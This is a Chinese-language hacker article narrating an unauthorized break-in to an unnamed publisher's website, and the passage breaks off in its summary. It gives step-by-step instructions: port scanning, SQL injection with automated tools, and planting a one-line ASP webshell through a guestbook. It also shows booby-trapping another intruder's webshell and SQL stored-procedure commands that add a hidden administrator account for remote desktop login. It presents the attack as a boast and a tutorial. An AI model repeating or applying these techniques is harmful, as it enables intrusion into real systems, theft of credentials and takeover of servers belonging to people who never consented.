多圖詳解：入侵國內(nèi)某知名出版社全記錄

第第頁多圖詳解：入侵國內(nèi)某知名出版社全記錄多圖詳解：入侵國內(nèi)某知名出版社全記錄

發(fā)表于：2023-06-23來源：：點(diǎn)擊數(shù)：標(biāo)簽：

一.“戰(zhàn)爭”序幕的拉開首先祝大家肉雞多多，技術(shù)進(jìn)步！最近在學(xué)習(xí)匯編，朋友推薦了一本不錯(cuò)的書，跑遍了附近的書店都沒有找到，于是在baidu搜到了該出版社的網(wǎng)站，剛一打開,你猜雜著？偶地KV網(wǎng)頁監(jiān)控馬上報(bào)告“發(fā)現(xiàn)病毒已經(jīng)清除”如圖1真是暈?。∵@種網(wǎng)站

一.“戰(zhàn)爭”序幕的拉開

首先祝大家肉雞多多，技術(shù)進(jìn)步！最近在學(xué)習(xí)匯編，朋友推薦了一本不錯(cuò)的書，跑遍了附近的書店都沒有找到，于是在baidu搜到了該出版社的網(wǎng)站，剛一打開,你猜雜著？偶地KV網(wǎng)頁監(jiān)控馬上報(bào)告“發(fā)現(xiàn)病毒已經(jīng)清除”如圖1

真是暈啊！這種網(wǎng)站都會(huì)被人掛馬，哎...現(xiàn)在國內(nèi)的網(wǎng)管...不說了！幸好偶打過補(bǔ)丁了，要不小命就此玩完了，呵呵！

小提示

網(wǎng)頁木馬的原理都是利用一些IE的漏洞來運(yùn)行程序(一般都是木馬程序），現(xiàn)在流行的網(wǎng)頁木馬如：XP＋SP2的網(wǎng)頁木馬，最近新出了一個(gè)利用'HelpControlLocalZoneBypass"的網(wǎng)頁木馬，需要的朋友可以去網(wǎng)上搜搜，一般黑客站點(diǎn)都有的。勤打補(bǔ)丁的話像市面上公布出來的網(wǎng)頁木馬就算打開了也沒有關(guān)系的！

看了一下這個(gè)網(wǎng)站支持在線購買圖書，要是那樣的話...呵呵!進(jìn)去了不就可以免費(fèi)買書了？反正也沒事干，那么就開始吧！

二.輪番轟炸

既然已經(jīng)被人掛了馬，那就是有人進(jìn)去過了(廢話)，大體觀察了一下，它的網(wǎng)站是ASP+MSSQL的，沒有什么論壇，看來想拿webshell不是很容易。

還是看看它開了什么端口吧！

小提示

菜鳥：為什么很多文章中都提到掃描端口，掃描端口到底有什么用呢？

小魚：理論的東西我不想多講了，通常說的掃描端口是指掃描TCP端口，系統(tǒng)中的每個(gè)網(wǎng)絡(luò)服務(wù)要與外部通信就必須用到端口，什么意思呢？就好比你跟聾啞人溝通用的是手語，不同的系統(tǒng)服務(wù)會(huì)用到不同的端口，比如開網(wǎng)站的服務(wù)器，就肯定開放了80端口，根據(jù)端口的開放情況可以判斷對方開了哪些服務(wù)從而方便我們找對應(yīng)的漏洞或者溢出！

手頭剛好有流光那就用它吧，一會(huì)兒功夫掃描結(jié)果就出來了，圖2

開了80，110，25，1433，3389這幾個(gè)端口，110和25是發(fā)送郵件時(shí)用到的，3389不知道是先前的入侵者開的還是管理員自己管理用開的！IIS版本是5.0可能是win2K的服務(wù)器，我們登陸3389看看，為什么要登陸3389？你還沒有權(quán)限怎么登陸??？登陸3389的目的主要是看看對方系統(tǒng)版本，圖3

是windows2000服務(wù)器版的！知道了目標(biāo)主機(jī)的一些基本信息，現(xiàn)在我們就針對這些信息來想出對應(yīng)的入侵方案，110和25端口好像沒什么重要的漏洞，所以先放一邊，1433是MSSQL服務(wù)開放的端口，默認(rèn)帳戶sa不知道有沒有弱口令，試試看，用SQL綜合利用工具連接用戶SA，密碼為空試試，圖4，

提示連接失敗，看來密碼不為空，想想也對！管理員怎么能傻到那種程度？再試試sqlhello-SQL溢出看看對方MSSQL打沒有打SP3（現(xiàn)在國內(nèi)很多你無法想象的超級大站還存在這種低級漏洞呢！具體，我可不敢說!呵呵），圖5

正向和反向的溢出都試過都是不行，看來這個(gè)漏洞是沒有了！剩下的只有80端口了，一般這個(gè)都是找腳本漏洞，在網(wǎng)站上找形如“xxx.asp?id=1"這樣的頁面，這個(gè)站上有很多，隨便試一個(gè)在后面加個(gè)單引號看看，圖6

一般出現(xiàn)像“錯(cuò)誤'80040e14'”這樣的都是說明存在SQL注入，那句“ODBCSQLServerDriver”一般有“ODBC”的說明是MSSQL數(shù)據(jù)庫的，要是提示“JET”那就是ACCESS數(shù)據(jù)庫了！我們再用工具找找看，拿出“啊D注入工具”掃掃，然后我用“HDSI”注入（完全是個(gè)人習(xí)慣?。诎中的“注入點(diǎn)掃描”中輸入網(wǎng)站的URL，點(diǎn)擊右邊第一個(gè)按鈕就會(huì)自動(dòng)檢測了，圖7

哈哈！有了！馬上將注入點(diǎn)復(fù)制到HDSI中進(jìn)行注入，點(diǎn)擊“開始”，圖8，

高興ing，連接數(shù)據(jù)庫的用戶居然是SA這下發(fā)財(cái)了，一條思路馬上展現(xiàn)在眼前，就是用HDSI找到web目錄，然后通過數(shù)據(jù)庫備份上傳ASP木馬，hoho！點(diǎn)擊HDSI左邊的“列目錄”開始尋找網(wǎng)站目錄，我找啊找...終于被我找到了，圖9

d:\xxxxhome下，馬上將一個(gè)ASP木馬的后綴改為txt用HDSI上傳到web目錄下，郁悶，圖10

提示“上傳文件不成功！”怎么辦？沒事既然是sa的權(quán)限不能這樣上傳還有別的辦法，試了試用xp_cmdshell直接加用戶，TFTP上傳，寫腳本上傳統(tǒng)統(tǒng)失敗了！我郁悶，真想一頭撞死算了！到嘴的美味吃不上，別提多難受了555...怎么辦？我想...我再想...有了，既然這個(gè)站已經(jīng)被人入侵過了，那么肯定會(huì)留下一些ASP木馬要是能找到一個(gè)小的ASP木馬不就可以上傳大馬了？雖然比較笨，不過黑貓白貓能捉到老鼠就是好貓了！我找...我繼續(xù)找...再次來到網(wǎng)站目錄下挨個(gè)看文件夾，突然看到一個(gè)MDB的目錄，心情開始激動(dòng)了，顫抖的手點(diǎn)了下去（哈哈！有點(diǎn)夸張）。哇塞！，圖11

里面有個(gè)guestbook.asp還有個(gè)a.asp，看看路徑寫著d:\xxxxhome\liuyan\mdb\，各位讀者猜到這是什么了么？對了留言板！看到留言板有什么好高興？我們知道了默認(rèn)數(shù)據(jù)庫路徑而且數(shù)據(jù)庫以ASP結(jié)尾，如果在留言中插入那個(gè)一句話的ASP木馬提交這樣就會(huì)記錄在數(shù)據(jù)庫中，而數(shù)據(jù)庫又是ASP結(jié)尾的這樣就跟一個(gè)ASP木馬一樣了，訪問數(shù)據(jù)庫web地址頁面出現(xiàn)了亂碼，圖12

這樣就是沒有做防下載處理，然后馬上在留言板中留言在“主頁”還有其他地方都輸入了“＜%evalrequest("#")%＞”提交成功，用海洋c端連接發(fā)現(xiàn)還是不成功（可能是被過濾掉了吧?。?！怎么辦呢？郁悶...于是用迅雷下載了這個(gè)ASP數(shù)據(jù)庫改名為MDB后打開，找出管理員賬號密碼，圖13

登陸留言板，經(jīng)過測試發(fā)現(xiàn)在管理員頁面的公告中可以插入木馬，圖14

這回成功拿到webshell了（圖15）

對了忘記告訴大家剛剛跟guestbook.asp同一目錄下的那個(gè)a.asp就是別人留的海洋2023的asp木馬！

小插曲

訪問那個(gè)a.asp將html代碼保存下來，這里的代碼就是海洋2023的登陸界面，然后用我的木馬編輯那個(gè)a.asp將里面的代碼全部清空掉，粘貼上剛剛復(fù)制的登陸頁面的html代碼，再在最下面掛上我的網(wǎng)頁木馬！哈哈！這樣只要那家伙訪問自己的webshell雖然看到登陸界面了但是怎么也登陸不進(jìn)去，而且還中了咱們的木馬！一個(gè)字爽！

三.拿下目標(biāo)

我用的也是海洋2023不過是加密免殺的，現(xiàn)在就是提權(quán)了，用海洋的“服務(wù)器相關(guān)數(shù)據(jù)”看了看開的服務(wù)，發(fā)現(xiàn)并沒有安裝serv-U，很多菜鳥看到這里可能就會(huì)放棄了！其實(shí)沒有serv-u也沒關(guān)系，畢竟條條大陸通羅馬么！還記得剛剛注入時(shí)是SA的權(quán)限么？這就說明數(shù)據(jù)庫連接用的是SA，到網(wǎng)站主頁下隨便打開一個(gè)ASP文件看看，圖16

“common/inc_const.asp”這個(gè)就是ASP被打開后先調(diào)用的數(shù)據(jù)庫連接文件了，我們馬上到該目錄下的common找到inc_const.asp對它編輯，圖17

怎么樣？是不是有大發(fā)現(xiàn)了，其實(shí)提權(quán)就是這么簡單！SA密碼暴露無疑?。?/p>

現(xiàn)在該怎么辦呢？拿出SQL連接器輸入密碼連接上去，哈哈成功了，選擇“利用目錄”＝＝》“執(zhí)行DOS命令”加個(gè)用戶試試，圖18

暈，xplog70.dll被刪了，可惡，既然開了3389只要加個(gè)用戶就可以了，加用戶也不一定要用XP_cmdshell，可以試試別的轉(zhuǎn)儲過程，打開"SQL查詢分析器分離版本"輸入IP和密碼點(diǎn)連接，圖19

OK，我們在“查詢”中輸入：

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

declare@cmdINT

execsp_oacreate'wscript.shell',@cmdoutput

execsp_oamethod@cmd,'run',null,'netuserhackhack/add','0','true'

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

declare@cmdINT

execsp_oacreate'wscript.shell',@cmdoutput

execsp_oamethod@cmd,'run',null,'netlocalgroupadministratorshack/add','0','true'

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

這個(gè)就是增加一個(gè)hack的用戶密碼也是hack，再提升為管理員權(quán)限，圖20

怎么樣？是不是條條大路通羅馬？

用增加的用戶登陸3389看看哈哈，成功！任務(wù)完成！^_^

四.小結(jié)

由于篇幅問題還有很多入侵的過程沒有寫出來，這里寫的是主